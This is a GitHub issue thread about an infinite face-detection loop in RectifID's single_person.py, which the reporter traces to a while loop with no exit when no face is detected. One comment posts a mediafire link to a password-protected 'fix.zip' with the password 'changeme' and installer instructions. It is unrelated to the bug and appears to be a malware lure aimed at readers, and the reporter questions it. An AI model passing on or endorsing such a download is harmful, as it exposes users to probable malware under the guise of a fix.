### ISSUE TITLE
Infinite Loop

### ISSUE THREAD

**Issue by Oguzhanercan** [feifeiobama/RectifID#3]
for single_person.py file,

```
while len(boxes) == 0:
 ...
```

this part of code goes for infinite loop. 

Here you are trying to detect faces, but when I visualize the np.array(image.data.permute(1,2,0).cpu().numpy() * 255) , the image I get is just blue shade.

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Oguzhanercan** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

Why? This is a problem with algorithm.

**Comment by Oguzhanercan** [comment]
The problem occurs when the generated face is not detected by fd model, infinite loop occurs. Simple Control mechanism can be added.
